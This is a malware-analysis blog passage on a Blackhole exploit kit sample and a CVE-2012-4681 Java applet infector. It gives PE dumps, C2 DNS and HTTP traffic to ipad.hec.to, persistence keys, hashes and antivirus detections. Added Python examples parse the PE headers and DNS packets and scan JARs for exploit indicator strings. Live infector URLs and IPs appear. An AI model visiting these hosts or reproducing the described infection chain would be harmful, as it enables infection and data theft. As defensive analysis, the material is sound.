Symantec : Trojan.ADH.2 (NEW)
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Comodo : UnclassifiedMalware
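Going back to the first-sector dump and PE summary of wpbt0.dll shown above: the compile time, section count and entry point all sit in the first 0xD0 bytes, so a reader can check them from the dump alone. Below is an added example (my own code, not the blog's tooling) that parses exactly that: the DOS header's e_lfanew, the COFF file header and the start of the optional header. It also shows an edge case the post hits later: the feq.html dump in the CVE-2012-4681 post only reaches 0x8F while its e_lfanew is 0xD8, so the parser must report "truncated" rather than read garbage. Both byte strings are transcribed from the dumps on this page with the ASCII columns dropped.

```python
import struct
from datetime import datetime, timezone

# First sector of wpbt0.dll, transcribed from the dump in this post.
WPBT0_DLL_HEAD = bytes.fromhex(
    "4D5A90000300000004000000FFFF0000" "B8000000000000004000000000000000"
    "00000000000000000000000000000000" "00000000000000000000000080000000"
    "0E1FBA0E00B409CD21B8014CCD215468" "69732070726F6772616D2063616E6E6F"
    "742062652072756E20696E20444F5320" "6D6F64652E0D0D0A2400000000000000"
    "504500004C010500601C535000000000" "00000000E0000F010B01013200EC0000"
    "00420000000000000010000000100000" "00100100000040000010000000020000"
    "04000000000000000400000000000000"
)
# First 0x90 bytes of feq.html (SVCHOST.EXE), transcribed from the dump in
# the CVE-2012-4681 post below; e_lfanew (0xD8) lies beyond what was dumped.
FEQ_HTML_HEAD = bytes.fromhex(
    "4D5A90000300000004000000FFFF0000" "B8000000000000004000000000000000"
    "00000000000000000000000000000000" "000000000000000000000000D8000000"
    "0E1FBA0E00B409CD21B8014CCD215468" "69732070726F6772616D2063616E6E6F"
    "742062652072756E20696E20444F5320" "6D6F64652E0D0D0A2400000000000000"
    "A50E2678E16F482BE16F482BE16F482B"
)

IMAGE_FILE_DLL = 0x2000            # Characteristics bit set for real DLLs
MACHINES = {0x14C: "i386", 0x8664: "x86-64"}
PE_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def parse_pe_head(data):
    """Parse DOS header -> COFF file header -> start of the optional header.
    Returns a dict of fields, or a dict with an 'error' key when the dump is
    too short to reach the PE header (the common case with a partial dump)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"error": "no MZ header"}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 24:          # 'PE\0\0' + 20-byte file header
        return {"error": "truncated before PE header", "e_lfanew": e_lfanew}
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"error": "bad PE signature", "e_lfanew": e_lfanew}
    machine, nsections, timestamp, _symtab, _nsyms, opt_size, chars = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    info = {
        "e_lfanew": e_lfanew,
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": timestamp,
        "compile_time": datetime.fromtimestamp(timestamp, timezone.utc)
                                .strftime("%Y-%m-%d %H:%M:%S UTC"),
        "characteristics": chars,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
    }
    opt = e_lfanew + 24
    # Magic (2), ..., AddressOfEntryPoint at +16, ImageBase at +28 (PE32).
    if opt_size >= 32 and len(data) >= opt + 32:
        magic = struct.unpack_from("<H", data, opt)[0]
        info["pe_format"] = PE_MAGIC.get(magic, hex(magic))
        info["entry_point"] = struct.unpack_from("<I", data, opt + 16)[0]
        if magic == 0x10B:
            info["image_base"] = struct.unpack_from("<I", data, opt + 28)[0]
    return info


if __name__ == "__main__":
    for label, blob in (("wpbt0.dll", WPBT0_DLL_HEAD), ("feq.html", FEQ_HTML_HEAD)):
        print(label, parse_pe_head(blob))
```

Two things fall out of the wpbt0.dll header that match the post: the TimeDateStamp decodes to 0x50531C60, 2012-09-14 12:00:32 UTC, and the Characteristics word 0x010F has no IMAGE_FILE_DLL bit, so despite the .dll name the file is a plain EXE, which is why VirusTotal reports "Win32 EXE" and the sandbox could run it as sample.exe.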
Well, it is supposed to connect to the internet, let's carefully run it a bit :-) Well it works as expected, & starts to communicate to the mothership - in 146.185.220.34! Below is my record of the UDP traffic:
Req:
00000000 00 02 01 00 00 01 00 00 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01                         .ru.....
Ans:
00000000 00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00 .ru..... ........
00000030 0e 0f 00 04 92 b9 dc 22                         ......."
Yes, it asked for
tuninglambosglamour.ru IN A // 146.185.220.34
I bet it does some more malicious stuff as per the referred analysis above. By the way, the network info of the mothership:
inetnum: 146.185.220.0 - 146.185.220.255
netname: mdsru-net
descr: MDS LTD.
country: RU
org: ORG-Ml192-RIPE
admin-c: AV6782-RIPE
tech-c: VA2854-RIPE
status: ASSIGNED PA
mnt-by: mdsru-mnt
source: RIPE # Filtered

organisation: ORG-Ml192-RIPE
org-name: MDS ltd.
org-type: OTHER
abuse-mailbox: info@mdsnet.org
address: Sofia Kovalevsaja st. 22
address: 620242 Ekaterinburg
address: Russian Federation
mnt-ref: mdsru-mnt
admin-c: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

person: Andrey Voronov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russian Federation
phone: +74957392422
nic-hdl: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

person: Vlad Abramov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russia
phone: +74957392422
nic-hdl: VA2854-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered
While the landing page is in this network:
inetnum: 203.91.112.0 - 203.91.119.255
netname: G-Mobile
descr: G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1,
descr: Ulaanbaatar 211213, Mongolia
country: MN
admin-c: TG154-AP
tech-c: TG154-AP

route: 203.91.113.0/24
descr: G-Mobile Subnet
origin: AS24559
mnt-by: MAINT-MN-WIRELESSCOM
changed: tulga@g-mobile.mn 20090205
source: APNIC

person: Tulga Gandavaa
nic-hdl: TG154-AP
e-mail: tulga@g-mobile.mn
address: G-Mobile Corporation,
address: Chingeltei district 1st khoroo, Baga toiruu - 3/9
address: Ulaanbaatar, Mongolia
phone: +976-98101111
fax-no: +976-11-311195
country: MN
changed: tulga@g-mobile.mn 20070111
mnt-by: MAINT-MN-G-MOBILE
↑There are four more domains hosted on the same IP, so there will be variations of possible spam links to this infector.
This case's malware family photograph:

Conclusion: The moral of this story is, the shellcode format of BHEK is starting to change. The usual kernel32.dll API based calls are becoming undetected, yet it downloaded the dropper binary, which now contains the copy API. It is a slight modification but it successfully fools some automation schemes. Further investigation made me realize the reason, which is written in "Bypassing Export address table Address Filter (EAF)", which can be viewed--->>[HERE] And additionally a friend advised the crash PoC of it here -->>[HERE] Maybe shellzer must be patched for handling this new type of shellcode. I must say, maybe I missed something, since most of the reversing was done manually, so sorry about that and please advise me in the comment area. I think some more other changes in BHEK distribution are on the run too. Let's keep our eyes stuck to it and see what happens. BTW, the infected urls are all up and alive so please be careful with them. Malware MUST Die!!

Thursday, September 13, 2012

Once upon a time with 62.152.104.149's undetected CVE-2012-4681 HTML infector (+full set of JAR payload infection)

One day when I was tracing a php injected infector code I bumped into the web site below:

With the following URL:
h00p://62.152.104.149/public/meeting/
It looks like a strange set of meeting download files, since the java jar set looks so "attractive", as if they're yelling at me "click me... click me!" :-) So I decided to investigate this site further, starting with this page. The HTTP communications: As per the pic above it's supposed to be:
Apache/2.2.17 (Fedora) Server at 62.152.104.149 Port 80
Let's see whether it really is the original Apache index..
GET /public/meeting/ HTTP/1.1
User-Agent: MalwareMustDieBuilt libcurl/7.21.4 zlib/1.2.5
Host: 62.152.104.149
Accept: */*

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2012 11:46:06 GMT
Server: Apache/2.2.17 (Fedora)
Content-Length: 1726
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /public/meeting</title>
</head>
<body>
<h1>Index of /public/meeting</h1>
:(blah blah)
It is real, so in the directory /public/meeting/ the claimed files do exist.. I am not trusting any infection related service that easily.. it is a habit.. I just fetched as many files as I could & found that /public/meeting/ has no further files except what I already got. I also found this web server contains some basic security setting flaws which I am not going to expose here; I assume those were the reason the malicious files were uploaded. Script kiddies.. BTW, for the server admin, the upload date was Aug 30th, please check your log around that time, some SQLi will cause some error_log entries in Apache (based on my experience). What malicious scheme is it? If we go back to the directory contents, people tend to click the known html file, in our example notice.html. Let's grab it:
--20:24:12-- h00p://62.152.104.149/public/meeting/notice.html
  => `notice.html'
Connecting to 62.152.104.149:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,222 (1.2K) [text/html]
100%[====================================>] 1,222 --.--K/s
20:24:13 (23.18 MB/s) - `notice.html' saved [1222/1222]
It contains code like this -->>[CLICK] (PS: I neutralized some characters so the text code will not infect you) This code has 3 major steps:
1. Execute the Javascript file "deployJava.js" to deploy JRE v1.7 on your PC (if you are detected using IE & in case you don't have one). Below is the snipcode:
2. Execute the malicious applet "applet.jar" by passing the initial parameter via the browser as coded below:
3. As per the ↑pic above, use an IFRAME to trigger the download of the "feq.html" file, which will be explained below eventually.
*) those files "deployJava.js", "feq.html" and "applet.jar" are in the same dir.
What is inside applet.jar? It contains code like this:---->>[CLICK] (PS: I neutralized some characters so the text code will not infect you) applet.jar contains the ex-ZeroDay CVE-2012-4681 flaw; the easiest way to recognize it is by grep'ing the below strings in the code:
java.security.ProtectionDomain
java.security.Permissions
java.security/cert.Certificate
setSecurityManager
file:///
sun.awt.SunToolkit
getField
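The grep above works on decompiled source; the same strings also sit verbatim in the constant pool of the compiled .class files inside the JAR, where class names use '/' instead of '.'. The added example below (my own code, not the blog's and not a real scanner product) turns that grep into a small JAR triage: it walks every .class entry, searches for each indicator in both dotted and internal form, and calls the archive suspicious when one class references at least four of them. The JAR it runs on is constructed in memory for the example; "Sample.class" and "Hello.class" are made-up entries, not the real applet.jar. I assume the third indicator was meant to be java.security.cert.Certificate (the actual class name).

```python
import io
import zipfile

# Indicator strings from the post above.  The third one is assumed to be
# java.security.cert.Certificate, the real class name.
INDICATORS = [
    "java.security.ProtectionDomain",
    "java.security.Permissions",
    "java.security.cert.Certificate",
    "setSecurityManager",
    "file:///",
    "sun.awt.SunToolkit",
    "getField",
]


def _forms(indicator):
    """Dotted form (string constants) and internal form (class references)."""
    return {indicator.encode(), indicator.replace(".", "/").encode()}


def scan_class_bytes(blob):
    """Return the sorted indicators found in one raw .class file."""
    return sorted(ind for ind in INDICATORS if any(f in blob for f in _forms(ind)))


def scan_jar(jar_bytes, threshold=4):
    """Return (verdict, {class_name: [indicators]}).  'suspicious' when any
    single class references at least `threshold` indicators."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".class"):
                continue
            found = scan_class_bytes(zf.read(info))
            if found:
                hits[info.filename] = found
    worst = max((len(v) for v in hits.values()), default=0)
    return ("suspicious" if worst >= threshold else "clean"), hits


def build_sample_jar(malicious=True):
    """Constructed JAR for the example: a benign class, and optionally a
    class whose constant pool references all seven indicators."""
    header = b"\xca\xfe\xba\xbe\x00\x00\x00\x32"          # class magic + version
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Hello.class", header + b"java/lang/Object\x00java/io/PrintStream")
        if malicious:
            body = b"\x00".join(i.replace(".", "/").encode() for i in INDICATORS)
            zf.writestr("Sample.class", header + body)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_jar(build_sample_jar()))          # suspicious, Sample.class hits
    print(scan_jar(build_sample_jar(False)))     # clean, no hits
```

The threshold matters: getField or setSecurityManager alone appear in plenty of legitimate code, but a single applet class touching SunToolkit, ProtectionDomain, Permissions and a file:/// code source at once is the CVE-2012-4681 privilege-escalation pattern, which is why the scan counts indicators per class rather than per archive.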
Exploit Code Grepped Result Pic: ↑Accordingly we know the infector url scheme goes like the steps below:
1. Getting the user to click notice.html
2. Making sure the browser is IE & then
3. Installing the zero-day-flawed version of java on the user's PC
4. Executing applet.jar to exploit the JRE and run a batch file to download feq.html to the PC with the name SVCHOST.EXE and execute it.
The payload is "feq.html", a binary file camouflaged as an HTML one. The file itself looks like this SVCHOST.EXE after being dropped on your PC: Let's analyze this binary a bit:
Plain PE Binary:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 A5 0E 26 78 E1 6F 48 2B E1 6F 48 2B E1 6F 48 2B ..&x.oH+.oH+.oH+
PE Sections:
.text  0x1000 0x440a  20480
.rdata 0x6000 0xc4a   4096
.data  0x7000 0x317c  12288
.rsrc  0xb000 0x18418 102400
Build Trace Result:
Packed by: Armadillo v1.71, Armadillo v1.71 - additional
Compiled by: Microsoft Visual C++ v6.0/5.0
Setup Made by: Installer VISE Custom, Installer VISE Custom
Some Details:
Entry Point: 0x16fe
Compile time: 0x503B61D5 [Mon Aug 27 12:02:29 2012 UTC]
Fake Attribs:
LangID: 040904b0
LegalCopyright: Copyright (C) Nesoft Corp.
InternalName:
FileVersion: 5, 1, 2600, 2181
CompanyName: Copyright (C) Nesoft Corp.
PrivateBuild:
LegalTrademarks:
Comments:
ProductName:
SpecialBuild:
ProductVersion: 5, 1, 2600, 2181
FileDescription: Internet Extensions for Win32
//Some malicious calls detected in reversing..
0x406018 KERNEL32.dll.CreateFileA     //Malicious
0x4060ac KERNEL32.dll.WriteFile       //Malicious
0x406027 KERNEL32.dll.CreateThread    //Malicious
0x40604d KERNEL32.dll.WinExec         //Malicious
0x406022 KERNEL32.dll.GetCommandLineA //Malicious
0x4060bc HeapCreate                   //DEP Violation
0x4060c8 VirtualAlloc                 //DEP Violation
0x40609c TlsSetValue                  //TLS aware calls
0x4060a0 TlsAlloc                     //TLS aware calls
0x4060a8 TlsGetValue                  //TLS aware calls
//+Registry op's:
ADVAPI32.dll.RegCreateKeyA   Hint[350]
ADVAPI32.dll.RegSetValueExA  Hint[390]
ADVAPI32.dll.RegCloseKey     Hint[347]
ADVAPI32.dll.RegOpenKeyExA   Hint[370]
//PS: List of complete call --->>[CLICK HERE]
Up to this point I can see the pattern of a trojan dropper; the packed area shows a list of names suggesting urls like "hec. to" & "http://%s" and so on, but some packed areas are a bit confusing and would need my full reversing effort to crack well.. According to the complete calls there is a lot of information gathered by those calls, which shows the possibility of spyware. There must be internet traffic made, since TLS and socket operations are detected. Since I was not in the mood to reverse this mess further - considering this payload is already 12 days old, so someone must have analyzed it well already - let's not waste our time further & make it faster: just run it & check the forensics result ...and got these details:
Dropped:
FileName: mdm.exe
C:\Documents and Settings\Administrator\Application Data\Microsoft\mdm.exe
MD5: 199c1c10088820aff239321bf5f6c87c
Size: 98304 Bytes
Pic:
Hex Snip:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 CC D5 3F 6A 88 B4 51 39 88 B4 51 39 88 B4 51 39 ..?j..Q9..Q9..Q9
Executed API:
Shell=C:\Documents and Settings\Administrator\Application Data\Microsoft\mdm.exe
AutoRun in Registry:
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run
wim = C:\Documents and Settings\Administrator\Application Data\Microsoft\mdm.exe
Malicious Process (daemonized)
PID/ProcessName: 3844 mdm
Base: C:\Documents and Settings\Administrator\Application Data\Microsoft\mdm.exe
Very good, we know exactly what mess we're dealing with now; it is trojan malware for sure. Let's see the network traffic made by it (I am a huge fan of tcpdump!). While running the dropped sample we got the DNS request for the ipad.hec.to host:
Req:
00000000 9a 5c 01 00 00 01 00 00 00 00 00 00 04 69 70 61 .\...... .....ipa
00000010 64 03 68 65 63 02 74 6f 00 00 01 00 01          d.hec.to .....
Ans:
00000000 9a 5c 81 80 00 01 00 01 00 04 00 05 04 69 70 61 .\...... .....ipa
00000010 64 03 68 65 63 02 74 6f 00 00 01 00 01 c0 0c 00 d.hec.to ........
00000020 01 00 01 00 00 0e 10 00 04 0c a3 20 0f c0 11 00 ........ ... ....
00000030 02 00 01 00 00 0e 10 00 10 03 6e 73 34 06 61 66 ........ ..ns4.af
00000040 72 61 69 64 03 6f 72 67 00 c0 11 00 02 00 01 00 raid.org ........
00000050 00 0e 10 00 06 03 6e 73 31 c0 3d c0 11 00 02 00 ......ns 1.=.....
00000060 01 00 00 0e 10 00 06 03 6e 73 33 c0 3d c0 11 00 ........ ns3.=...
00000070 02 00 01 00 00 0e 10 00 06 03 6e 73 32 c0 3d c0 ........ ..ns2.=.
00000080 55 00 01 00 01 00 00 01 2c 00 04 32 17 c5 5f c0 U....... ,..2.._.
00000090 55 00 1c 00 01 00 00 01 2c 00 10 26 07 f0 d0 11 U....... ,..&....
000000A0 02 00 d5 00 00 00 00 00 00 00 02 c0 79 00 01 00 ........ ....y...
000000B0 01 00 00 01 2c 00 04 ae 25 c4 37 c0 67 00 01 00 ....,... %.7.g...
000000C0 01 00 00 01 2c 00 04 48 14 0f 3e c0 39 00 01 00 ....,..H ..>.9...
000000D0 01 00 00 01 2c 00 04 ae 80 f6 66                ....,... ..f
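Both DNS captures on this page, the tuninglambosglamour.ru answer in the BHEK post above and the ipad.hec.to answer just shown, can be decoded by hand, but the second one is a good test of RFC 1035 name compression: every NS and glue record name is a pointer back into the packet. The added example below (my own code, not the blog's) is a minimal DNS message parser that follows those pointers, decodes A/AAAA/NS rdata, and returns the question, answer, authority and additional sections. The two byte strings are transcribed from the hexdumps on this page (ASCII columns dropped).

```python
import struct
import ipaddress

QTYPES = {1: "A", 2: "NS", 5: "CNAME", 28: "AAAA"}

# "Ans" packet from the BHEK post above (tuninglambosglamour.ru).
BHEK_DNS_ANSWER = bytes.fromhex(
    "0002818000010001000000001374756e" "696e676c616d626f73676c616d6f7572"
    "0272750000010001c00c000100010000" "0e0f000492b9dc22"
)
# "Ans" packet from the capture just above (ipad.hec.to).
HEC_DNS_ANSWER = bytes.fromhex(
    "9a5c8180000100010004000504697061" "640368656302746f0000010001c00c00"
    "01000100000e1000040ca3200fc01100" "02000100000e100010036e7334066166"
    "72616964036f726700c0110002000100" "000e100006036e7331c03dc011000200"
    "0100000e100006036e7333c03dc01100" "02000100000e100006036e7332c03dc0"
    "55000100010000012c00043217c55fc0" "55001c00010000012c00102607f0d011"
    "0200d50000000000000002c079000100" "010000012c0004ae25c437c067000100"
    "010000012c000448140f3ec039000100" "010000012c0004ae80f666"
)


def read_name(msg, off):
    """Decode a name at `off`, following compression pointers (0xC0xx).
    Returns (name, offset just past the name as it appears at `off`)."""
    labels, jumped, end, hops = [], False, None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # 2-byte pointer
            ptr = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            if ptr >= off:                        # pointers only go backwards
                raise ValueError("forward compression pointer")
            if not jumped:
                end = off + 2
            off, jumped, hops = ptr, True, hops + 1
            if hops > 64:
                raise ValueError("pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if jumped else off)


def read_rr(msg, off):
    """Decode one resource record; rdata is rendered for A, AAAA, NS, CNAME."""
    name, off = read_name(msg, off)
    rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
    off += 10
    rdata = msg[off:off + rdlen]
    if rtype == 1 and rdlen == 4:
        value = str(ipaddress.IPv4Address(rdata))
    elif rtype == 28 and rdlen == 16:
        value = str(ipaddress.IPv6Address(rdata))
    elif rtype in (2, 5):
        value, _ = read_name(msg, off)
    else:
        value = rdata.hex()
    return {"name": name, "type": QTYPES.get(rtype, rtype), "ttl": ttl, "data": value}, off + rdlen


def parse_dns(msg):
    """Parse a DNS message into header flags plus its four sections."""
    txid, flags, qd, an, ns, ar = struct.unpack_from("!HHHHHH", msg, 0)
    off = 12
    out = {"id": txid, "response": bool(flags & 0x8000), "rcode": flags & 0xF,
           "questions": [], "answers": [], "authority": [], "additional": []}
    for _ in range(qd):
        qname, off = read_name(msg, off)
        qtype, _qclass = struct.unpack_from("!HH", msg, off)
        off += 4
        out["questions"].append((qname, QTYPES.get(qtype, qtype)))
    for key, count in (("answers", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            rr, off = read_rr(msg, off)
            out[key].append(rr)
    return out


if __name__ == "__main__":
    for pkt in (BHEK_DNS_ANSWER, HEC_DNS_ANSWER):
        r = parse_dns(pkt)
        for rr in r["answers"] + r["authority"] + r["additional"]:
            print(f'{rr["name"]:24} {rr["type"]:5} {rr["ttl"]:6} {rr["data"]}')
```

Decoding the ipad.hec.to answer gives the A record 12.163.32.15 with a 3600 s TTL, four NS records for hec.to pointing at ns1..ns4.afraid.org, and five glue records for those name servers (including one AAAA), which is the FreeDNS delegation noted in the "dig" output further down. The 3599 s TTL on the tuninglambosglamour.ru answer shows it came from a resolver cache rather than the authority.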
Then we saw the HTTP/POST packet sent from our malware:
In Hex:
00000000 50 4f 53 54 20 2f 34 33 30 38 32 38 2e 61 73 70 POST /43 0828.asp
00000010 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a  HTTP/1. 1..Host:
00000020 20 69 70 61 64 2e 68 65 63 2e 74 6f 0d 0a 43 6f  ipad.he c.to..Co
00000030 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 0d ntent-Le ngth: 1.
00000040 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 43 6f .Accept: */*..Co
00000050 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c ntent-Ty pe: appl
00000060 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 ication/ octet-st
00000070 72 65 61 6d 0d 0a 55 73 65 72 2d 41 67 65 6e 74 ream..Us er-Agent
00000080 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozill a/4.0 (c
00000090 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatibl e; MSIE 
000000A0 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 6.0; Win dows NT 
000000B0 35 2e 31 29 0d 0a 0d 0a                         5.1)....
:(HOST) (IP)
Plain Text:
POST /430828.asp HTTP/1.1
Host: ipad.hec.to
Content-Length: 1
Accept: */*
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
There goes your Browser/Hostname/IP information... (since my RAT is still down & I used my wife's PC to test :-P, I can't show more..) .. written in the packet sent via the POST command to this mothership. I am sure there is a server side file "430828.asp" receiving our info. Then an HTTP/GET command was sent:
In Hex:
00000000 47 45 54 20 2f 34 33 32 30 31 35 6e 2e 74 78 74 GET /432 015n.txt
00000010 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a  HTTP/1. 1..Host:
00000020 20 69 70 61 64 2e 68 65 63 2e 74 6f 0d 0a 43 6f  ipad.he c.to..Co
00000030 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d ntent-Le ngth: 0.
00000040 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 43 6f .Accept: */*..Co
00000050 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c ntent-Ty pe: appl
00000060 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 ication/ octet-st
00000070 72 65 61 6d 0d 0a 55 73 65 72 2d 41 67 65 6e 74 ream..Us er-Agent
00000080 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozill a/4.0 (c
00000090 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatibl e; MSIE 
000000A0 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 6.0; Win dows NT 
000000B0 35 2e 31 29 0d 0a 0d 0a                         5.1)....
Plain Text:
GET /432015n.txt HTTP/1.1
Host: ipad.hec.to
Content-Length: 0
Accept: */*
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
To make things shorter (again), the saved pcap file looks like this in Wireshark with the timeline sorted: Let's "dig" a little bit further into the mothership network:
Name: ipad.hec.to
Address: 12.163.32.15
NS: afraid.org (FreeDNS) NS1.AFRAID.ORG & NS2.AFRAID.ORG
Network and Routing via: AS7018 / ATT-INTERNET4 AT&T WorldNet Services
This is at least what I have checked so far. So let's compare our investigation result with Virus Total: The svchost.exe:
MD5: 265f46c572f4e5a3b17d39cb74f01e15
File size: 140.0 KB ( 143360 bytes )
File name: scvhost.exe
File type: Win32 EXE
Tags: peexe armadillo mz
Detection: 32 / 42
Analysis date: 2012-09-12 15:13:01 UTC ( 0 分 ago )
URL:------>>[CLICK]
Malware Name:
nProtect : Trojan-Spy/W32.Agent.143360.X
CAT-QuickHeal : TrojanDropper.Malf
McAfee : Generic Dropper.p
K7AntiVirus : Trojan
VirusBuster : Trojan.DR.Agent!VaQDwJLyD+E
F-Prot : W32/Dropper.gen8!Maximus
Symantec : Trojan.Gen
Norman : W32/Troj_Generic.DTHAK
ByteHero : Trojan.Malware.Obscu.Gen.006
TrendMicro-HouseCall : TROJ_GEN.R47CDHU
Avast : Win32:Spyware-gen [Spy]
Kaspersky : Trojan-Spy.Win32.Agent.cdvo
BitDefender : Gen:Trojan.Heur.iq0@InUaCZdi
Sophos : Sus/Behav-1018
Comodo : UnclassifiedMalware
F-Secure : Gen:Trojan.Heur.iq0@InUaCZdi
DrWeb : Trojan.DownLoader6.49798
VIPRE : Trojan.Win32.Generic!BT
AntiVir : TR/Dropper.Gen
TrendMicro : TROJ_GEN.R47CDHU
McAfee-GW-Edition : Generic Dropper.p
Emsisoft : Trojan-Dropper.Win32.Malf!IK
Jiangmin : Trojan/Agent.hfrc
Microsoft : TrojanDropper:Win32/Malf.gen
ViRobot : Trojan.Win32.A.Agent.143360.FP
GData : Gen:Trojan.Heur.iq0@InUaCZdi
Commtouch : W32/Dropper.gen8!Maximus
ESET-NOD32 : Win32/Spindest.B
VBA32 : SScope.Trojan.Vundo.2721
PCTools : Trojan.Gen
Ikarus : Trojan-Dropper.Win32.Malf
AVG : PSW.Agent.AXPJ.dropper
The mdm.exe:
MD5: 199c1c10088820aff239321bf5f6c87c
File size: 96.0 KB ( 98304 bytes )
File name: mdm.exe
File type: Win32 EXE
Tags: peexe armadillo
Detection: 25 / 42
Analysis date: 2012-09-12 15:23:52 UTC ( 0 分 ago )
URL:-------->>[CLICK]
MalwareName:
CAT-QuickHeal : TrojanSpy.Agent.cdvo
McAfee : Generic PWS.o
K7AntiVirus : Spyware
F-Prot : W32/Heuristic-KPP!Eldorado
Symantec : Trojan.Gen
Norman : W32/Troj_Generic.DUHUU
ESET-NOD32 : Win32/Spindest.B
TrendMicro-HouseCall : TROJ_GEN.R11C9I2
Avast : Win32:Spyware-gen [Spy]
Kaspersky : Trojan-Spy.Win32.Agent.cdvo
BitDefender : Gen:Variant.Graftor.24477
Comodo : UnclassifiedMalware
F-Secure : Gen:Variant.Graftor.24477
DrWeb : Trojan.DownLoader6.49798
VIPRE : Trojan.Win32.Generic!BT
AntiVir : HEUR/Malware
TrendMicro : TROJ_GEN.R11C9I2
McAfee-GW-Edition : Generic PWS.o
Emsisoft : Win32.SuspectCrc!IK
Jiangmin : TrojanSpy.Agent.xpg
ViRobot : Trojan.Win32.A.Agent.98304.AAK
GData : Gen:Variant.Graftor.24477
PCTools : Trojan.Gen
Ikarus : Win32.SuspectCrc
AVG : PSW.Agent.AXPJ
The applet.jar:
MD5: 93775017d90ee6c05a2a69bde6b194df
File size: 1.3 KB ( 1309 bytes )
File name: applet.jar
File type: JAR
Detection: 15 / 42
Analysis date: 2012-09-12 15:28:38 UTC ( 0 分 ago )
URL:-------->>[CLICK]
Malware Name:
F-Secure : Exploit:Java/CVE-2012-4681.D
DrWeb : Java.Downloader.688
Microsoft : Exploit:Java/CVE-2012-4681.FX
AntiVir : EXP/CVE-2012-4681
TrendMicro : JAVA_EXPL.SM4
